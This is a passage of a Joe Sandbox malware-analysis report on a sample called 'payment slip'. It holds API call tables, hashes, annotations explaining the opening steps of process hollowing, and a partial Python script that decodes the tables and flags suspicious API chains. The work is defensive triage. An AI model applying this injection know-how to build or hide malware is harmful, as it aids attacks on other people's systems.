                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated$U
                                        • API String ID: 2914291525-3335495158
                                        • Opcode ID: 0df3783e2a1b2293c22f4158df71090d130e662a22a76c63718acfcbd84053c1
                                        • Instruction ID: 4bf72cf3bf39901996169f965aa2a792f9927ed7d1f95d6b22e89c4d6d0f5753
                                        • Opcode Fuzzy Hash: 0df3783e2a1b2293c22f4158df71090d130e662a22a76c63718acfcbd84053c1
                                        • Instruction Fuzzy Hash: 6C21EFB1D01308AFEB00DFA4E889F9DBBB4FB08704F10811AF655AA6A0D7B90580CF91

                                        Control-flow Graph (image; legend: Executed / Not Executed)
                                        control_flow_graph 372 7065b-7068b call 7042f 375 706a6-706b2 call 65221 372->375 376 7068d-70698 call 5f2c6 372->376 381 706b4-706c9 call 5f2c6 call 5f2d9 375->381 382 706cb-70714 call 7039a 375->382 383 7069a-706a1 call 5f2d9 376->383 381->383 391 70716-7071f 382->391 392 70781-7078a GetFileType 382->392 393 7097d-70983 383->393 397 70756-7077c GetLastError call 5f2a3 391->397 398 70721-70725 391->398 394 707d3-707d6 392->394 395 7078c-707bd GetLastError call 5f2a3 CloseHandle 392->395 400 707df-707e5 394->400 401 707d8-707dd 394->401 395->383 409 707c3-707ce call 5f2d9 395->409 397->383 398->397 402 70727-70754 call 7039a 398->402 406 707e9-70837 call 6516a 400->406 407 707e7 400->407 401->406 402->392 402->397 415 70847-7086b call 7014d 406->415 416 70839-70845 call 705ab 406->416 407->406 409->383 422 7087e-708c1 415->422 423 7086d 415->423 416->415 421 7086f-70879 call 686ae 416->421 421->393 425 708c3-708c7 422->425 426 708e2-708f0 422->426 423->421 425->426 428 708c9-708dd 425->428 429 708f6-708fa 426->429 430 7097b 426->430 428->426 429->430 431 708fc-7092f CloseHandle call 7039a 429->431 430->393 434 70963-70977 431->434 435 70931-7095d GetLastError call 5f2a3 call 65333 431->435 434->430 435->434
                                        APIs
                                          • Part of subcall function 0007039A: CreateFileW.KERNELBASE(00000000,00000000,?,00070704,?,?,00000000,?,00070704,00000000,0000000C), ref: 000703B7
                                        • GetLastError.KERNEL32 ref: 0007076F
                                        • __dosmaperr.LIBCMT ref: 00070776
                                        • GetFileType.KERNELBASE(00000000), ref: 00070782
                                        • GetLastError.KERNEL32 ref: 0007078C
                                        • __dosmaperr.LIBCMT ref: 00070795
                                        • CloseHandle.KERNEL32(00000000), ref: 000707B5
                                        • CloseHandle.KERNEL32(?), ref: 000708FF
                                        • GetLastError.KERNEL32 ref: 00070931
                                        • __dosmaperr.LIBCMT ref: 00070938
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: H
                                        • API String ID: 4237864984-2852464175
                                        • Opcode ID: 9b7b801186cf6d730534640c23318333462c1404042e55be7e6722558444fbda
                                        • Instruction ID: fa726f59b53b6d2206048bbe8ad249dcafc65ce9e29808d9753e5efb6f17c705
                                        • Opcode Fuzzy Hash: 9b7b801186cf6d730534640c23318333462c1404042e55be7e6722558444fbda
                                        • Instruction Fuzzy Hash: FCA13632E14145CFDF19AF68DC51BAE3BE0AB06320F14825DF8599B392CB399D12CB95

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00032B8E
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00032B9D
                                        • LoadIconW.USER32(00000063), ref: 00032BB3
                                        • LoadIconW.USER32(000000A4), ref: 00032BC5
                                        • LoadIconW.USER32(000000A2), ref: 00032BD7
                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00032BEF
                                        • RegisterClassExW.USER32(?), ref: 00032C40
                                          • Part of subcall function 00032CD4: GetSysColorBrush.USER32(0000000F), ref: 00032D07
                                          • Part of subcall function 00032CD4: RegisterClassExW.USER32(00000030), ref: 00032D31
                                          • Part of subcall function 00032CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00032D42
                                          • Part of subcall function 00032CD4: InitCommonControlsEx.COMCTL32(?), ref: 00032D5F
                                          • Part of subcall function 00032CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00032D6F
                                          • Part of subcall function 00032CD4: LoadIconW.USER32(000000A9), ref: 00032D85
                                          • Part of subcall function 00032CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00032D94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                        • String ID: #$0$AutoIt v3
                                        • API String ID: 423443420-4155596026
                                        • Opcode ID: 03e5510eb6c2ab133b740f23610c8b17c7556e3263f66d1543759a03a4e249da
                                        • Instruction ID: bb108381398789bc5f55446103ec3de5fbed9f83fab81ddc65a00a6f0bd037f6
                                        • Opcode Fuzzy Hash: 03e5510eb6c2ab133b740f23610c8b17c7556e3263f66d1543759a03a4e249da
                                        • Instruction Fuzzy Hash: D9211A70E10314BBEB109FA5EC59EA97FF4FB48B60F04011AF544AAAA0D7F94580DF90

                                         Control-flow Graph
                                         • Graph not reproduced in this text export. Basic blocks span 0x33170-0x3326d plus an out-of-line chunk at 0x72d9c-0x72e96; the executed/not-executed colouring of the interactive graph is lost. The chunk at 0x72d9c also calls MoveWindow and SetFocus, which the APIs table below does not list.
                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0003316A,?,?), ref: 000331D8
                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,0003316A,?,?), ref: 00033204
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00033227
                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0003316A,?,?), ref: 00033232
                                        • CreatePopupMenu.USER32 ref: 00033246
                                        • PostQuitMessage.USER32(00000000), ref: 00033267
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                        • String ID: TaskbarCreated
                                        • API String ID: 129472671-2362178303
                                        • Opcode ID: 83b9cfc4e039b1c6e94e70ff9ac0e468b4cccbbe290988c0f1ea91866748836a
                                        • Instruction ID: db750c1197e4bf579c0d9d6f71e4ec79259d06a7072dcb1c3a4ded07151caa17
                                        • Opcode Fuzzy Hash: 83b9cfc4e039b1c6e94e70ff9ac0e468b4cccbbe290988c0f1ea91866748836a
                                        • Instruction Fuzzy Hash: 3C417B31604200BBEB361B78DD8DFBE3A9DF705314F044125F94A9A5E2CBBC8E8097A5

                                         Control-flow Graph
                                         • Graph not reproduced in this text export. Basic blocks span 0x68d45-0x690f9; the function calls GetConsoleMode, ReadConsoleW, ReadFile and GetLastError (no APIs table is printed for it). That call pattern is the C runtime's low-level read helper (console input via ReadConsoleW, otherwise ReadFile), not sample-specific behaviour.
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ee3ca9e03840b01c7f71f2bc98c8a309733d74a6c86b6862fcb4c218ff386c1
                                        • Instruction ID: 64925fcf7e326d840ddc240013e141eac246c497ad2e8fe0d16f71647c6cfce6
                                        • Opcode Fuzzy Hash: 9ee3ca9e03840b01c7f71f2bc98c8a309733d74a6c86b6862fcb4c218ff386c1
                                        • Instruction Fuzzy Hash: 14C10474D04249AFEF21DFA8C845BEDBBF6AF09310F044199E855A7392CB748D41CB60

                                         Control-flow Graph
                                         • Graph not reproduced in this text export. Basic blocks span 0x3b025f0-0x3b028f2 in the unbacked region; the graph shows CreateFileW, VirtualAlloc, ReadFile, a second VirtualAlloc, FindCloseChangeNotification and VirtualFree on two paths, whereas the APIs table below lists only CreateFileW and VirtualFree. FindCloseChangeNotification closes its handle through the same NtClose path as CloseHandle, so the stub can close the file without resolving CloseHandle by name.
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03B026C1
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03B028E7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1389714096.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3b00000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateFileFreeVirtual
                                        • String ID:
                                        • API String ID: 204039940-0
                                        • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                        • Instruction ID: 44fbf7bc95cc8c098bbea80235598c6638618a15db91dec604da8fad81f16e84
                                        • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                        • Instruction Fuzzy Hash: 11A10774E00209EBDB14CFA4C998BAEBBB5FF48308F2485A9E505BB2C0D7759A45CF54

                                         Control-flow Graph
                                         • Graph not reproduced in this text export. The function is a single basic block at 0x32c63-0x32cd3 calling CreateWindowExW twice and ShowWindow twice (listed below).
                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00032C91
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00032CB2
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00031CAD,?), ref: 00032CC6
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00031CAD,?), ref: 00032CCF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: 78c5d2abaf06eaf68bb65a583cfa2785917e04fcd31451cca0bc2177e9b5d0fd
                                        • Instruction ID: 6845dfbea31787348dc91c0bdc516c72a14f93ceb97e91f6744dcaeced51df53
                                        • Opcode Fuzzy Hash: 78c5d2abaf06eaf68bb65a583cfa2785917e04fcd31451cca0bc2177e9b5d0fd
                                        • Instruction Fuzzy Hash: F4F0DA755403907AFB311717AC0CE773EBDE7C6F60B00105EF944AA9A0C6B91891DAB0

                                         Control-flow Graph
                                         • Graph not reproduced in this text export. Basic blocks span 0x3b023b0-0x3b025ae in the unbacked region; the graph shows CreateFileW, VirtualAlloc, ReadFile and ExitProcess, of which the APIs table below lists only CreateFileW (plus the Sleep in subcall 0x3b022a0).
                                        APIs
                                          • Part of subcall function 03B022A0: Sleep.KERNELBASE(000001F4), ref: 03B022B1
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03B024E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1389714096.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3b00000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateFileSleep
                                        • String ID: AVHN1SCHS2QV2RV1QNI0JKSU
                                        • API String ID: 2694422964-4111582466
                                        • Opcode ID: 23ec43a938651ed3db32912e164342f5ebf26aba61e99d7c90ae6129bc79d76b
                                        • Instruction ID: a8050244539a4ddb2a0f56e837da23fcde72e015044f9199d892f6c3b8ced5e8
                                        • Opcode Fuzzy Hash: 23ec43a938651ed3db32912e164342f5ebf26aba61e99d7c90ae6129bc79d76b
                                        • Instruction Fuzzy Hash: 56516030D04248DAEF11DBE4C859BDEBBB9AF15304F0445D9E2487B2C1D7B91B48CBA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (R$Variable must be of type 'Object'.
                                        • API String ID: 0-1029580346
                                        • Opcode ID: e4fdb35eb095dca47740685b97908ebecfb3067fe505b54bd2ceca2d9aee6b85
                                        • Instruction ID: b70732e3c6c73155f2b5c02d18ff0ccf88ff8bf0f8e541acd94b363d0cad2302
                                        • Opcode Fuzzy Hash: e4fdb35eb095dca47740685b97908ebecfb3067fe505b54bd2ceca2d9aee6b85
                                        • Instruction Fuzzy Hash: 06C2AC71E00245CFCB25DF98C884AADB7F5BF48700F248269E946AB392D775EE41CB91

                                         Control-flow Graph
                                         • Graph not reproduced in this text export. Basic blocks span 0xa2947-0xa2cf6; the graph shows DeleteFileW on four paths and CopyFileW on one (listed below).
                                        APIs
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000A2C05
                                        • DeleteFileW.KERNEL32(?), ref: 000A2C87
                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000A2C9D
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000A2CAE
                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000A2CC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: File$Delete$Copy
                                        • String ID:
                                        • API String ID: 3226157194-0
                                        • Opcode ID: 04a5a4924947204bd526907e1221ba3fedaec2db1e69bcd380edb067762f4925
                                        • Instruction ID: 44bbc15a8ef6fa58dec5c0ca6bdba68796d5ead040726d42f86482692e384646
                                        • Opcode Fuzzy Hash: 04a5a4924947204bd526907e1221ba3fedaec2db1e69bcd380edb067762f4925
                                        • Instruction Fuzzy Hash: 5EB15D71900119ABDF25DBE8CC85EDEB7BDEF49350F1040A6FA09E6152EB319A448F61

                                        APIs
                                          • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00031BF4
                                          • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00031BFC
                                          • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00031C07
                                          • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00031C12
                                          • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00031C1A
                                          • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00031C22
                                          • Part of subcall function 00031B4A: RegisterWindowMessageW.USER32(00000004,?,000312C4), ref: 00031BA2
                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0003136A
                                        • OleInitialize.OLE32 ref: 00031388
                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 000724AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                        • String ID: P
                                        • API String ID: 1986988660-1343716551
                                        • Opcode ID: 9c8ac74295fa6038bd5e047daae4856e988cd38b84ea2a70708afbd15b2545eb
                                        • Instruction ID: adebd1933317dabbf69f7c1e73af58d23cb3b17d076f0fa0e7f4a99294e1ac8b
                                        • Opcode Fuzzy Hash: 9c8ac74295fa6038bd5e047daae4856e988cd38b84ea2a70708afbd15b2545eb
                                        • Instruction Fuzzy Hash: CA71A2B4901200AFD385DF79ED45A953AE5FB8A340754812EE0CADBAB2EBFC4581CF41
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00033B0F,SwapMouseButtons,00000004,?), ref: 00033B40
                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00033B0F,SwapMouseButtons,00000004,?), ref: 00033B61
                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00033B0F,SwapMouseButtons,00000004,?), ref: 00033B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Control Panel\Mouse
                                        • API String ID: 3677997916-824357125
                                        • Opcode ID: 3f5404f8c4f530ba5e77353ebea98b95d2b9230cbaf638e4313cfb4b4b22c779
                                        • Instruction ID: bb1aa22a2cd16c450adb9287a077885d5099cc7f7ab5b7ab6c21787d93d3e2bc
                                        • Opcode Fuzzy Hash: 3f5404f8c4f530ba5e77353ebea98b95d2b9230cbaf638e4313cfb4b4b22c779
                                        • Instruction Fuzzy Hash: AD112AB5510208FFEB618FA5DC84EAEB7BCEF44744F104459EA05D7110D3319E409760
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03B01ACD
                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03B01AF1
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03B01B13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1389714096.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3b00000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                        • String ID:
                                        • API String ID: 2438371351-0
                                        • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                        • Instruction ID: fd983c4951f46637f359ca176249b6c396061e72968d94f371d47ba0d3c5b766
                                        • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                        • Instruction Fuzzy Hash: 5E620934A14258DBEB24CFA4C850BDEB776EF58304F1091A9D10DEB2D0E77A9E81CB59
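The three rows at 03B01ACD, 03B01AF1 and 03B01B13 are the opening steps of process hollowing: CreateProcessW spawns a child, Wow64GetThreadContext fetches its initial thread context (the printed word 0x10007 equals CONTEXT_FULL), and a 4-byte ReadProcessMemory fetches the child's 32-bit PEB.ImageBaseAddress pointer. The later steps of the technique (writing the child's memory, SetThreadContext, ResumeThread) are not in this function's table. The rows at 03B026C1 and 03B028E7 belong to the other stub in the same unbacked 0x03B00000 region, which opens a file with GENERIC_READ, full sharing and OPEN_EXISTING and later frees a region with MEM_RELEASE. The script below, an added example that is not part of the Joe Sandbox report or its tooling, parses rows in the format printed on this page, decodes those constants using the Windows SDK values, and flags the ordered API chain. Assumptions: the sample rows are copied verbatim from the tables above; reading 0x10007 as the caller's CONTEXT.ContextFlags is an inference, since that parameter is a pointer; the report prints raw stack words at the call site, so the argument window can be shifted by a word (compare the two CreateFileW rows on this page), and the CreateFileW decoder compensates by anchoring on the access mask; the chain names are this example's own.

```python
"""Decode and triage the "APIs" tables of a Joe Sandbox function listing.
Added example for this page, not Joe Sandbox code; sample rows are copied from
the tables above, constant names are from the Windows SDK headers."""
import re
from collections import namedtuple

# One table row, e.g. "CreateFileW.KERNELBASE(?,80000000,...), ref: 03B024E8",
# "Part of subcall function 03B022A0: Sleep.KERNELBASE(000001F4), ref: 03B022B1"
# or "CreatePopupMenu.USER32 ref: 00033246" (no argument list printed).
API_ROW = re.compile(
    r"(?P<sub>Part of subcall function\s+[0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# args: stack words exactly as printed ('?' and string literals included);
# ref: call-site address; subcall: row belongs to a callee of the function.
ApiCall = namedtuple("ApiCall", "api module args ref subcall")


def parse_api_rows(text):
    """Parse every API row in text; other lines (hashes, dump sources) are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_ROW.search(line)
        if m:
            raw = m.group("args") or ""
            args = tuple(a.strip() for a in raw.split(",")) if raw else ()
            calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                 int(m.group("ref"), 16), m.group("sub") is not None))
    return calls


def word(arg):
    """Integer value of a printed stack word, or None for '?' and string literals."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", arg) else None


def bits(value, table):
    """Name the flag bits set in value; bits missing from table are kept as hex."""
    names, rest = [], value
    for bit, name in table:
        if (value & bit) == bit:
            names.append(name)
            rest &= ~bit
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"


ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE")]
SHARE = [(1, "FILE_SHARE_READ"), (2, "FILE_SHARE_WRITE"), (4, "FILE_SHARE_DELETE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"}
FILE_ATTR = [(0x80, "FILE_ATTRIBUTE_NORMAL"), (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE")]
FREE_TYPE = [(0x8000, "MEM_RELEASE"), (0x4000, "MEM_DECOMMIT")]


def decode_create_file(args):
    """CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
    dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile). The printed stack
    window is sometimes shifted by one word (compare the two CreateFileW rows on
    this page), so anchor on the GENERIC_* mask instead of trusting position 1."""
    vals = [word(a) for a in args]
    for i, v in enumerate(vals):
        if v is not None and v & 0xF0000000 and i + 5 <= len(vals):
            access, share, _security, disp, attr = vals[i:i + 5]
            if None in (share, disp, attr):
                break
            return {"dwDesiredAccess": bits(access, ACCESS), "dwShareMode": bits(share, SHARE),
                    "dwCreationDisposition": DISPOSITION.get(disp, hex(disp)),
                    "dwFlagsAndAttributes": bits(attr, FILE_ATTR)}
    return {}


def decode_call(call):
    """{parameter: decoded value} for the APIs this example knows about, else {}."""
    v = [word(a) for a in call.args]
    if call.api == "CreateFileW":
        return decode_create_file(call.args)
    if call.api == "VirtualFree" and len(v) > 2 and v[2] is not None:
        return {"dwFreeType": bits(v[2], FREE_TYPE)}
    if call.api.endswith("GetThreadContext") and len(v) > 1 and v[1] is not None:
        # Assumption: the printed word is CONTEXT.ContextFlags; 0x10007 is CONTEXT_FULL.
        return {"ContextFlags": "CONTEXT_FULL" if v[1] == 0x10007 else hex(v[1])}
    if call.api == "ReadProcessMemory" and len(v) > 3 and v[3] is not None:
        return {"nSize": v[3]}  # 4 bytes right after GetThreadContext: one 32-bit pointer
    return {}


# Ordered API chains worth flagging (names are this example's own). APIs are
# normalised (Wow64 prefix and A/W suffix dropped) so variants hit the same rule.
CHAINS = {
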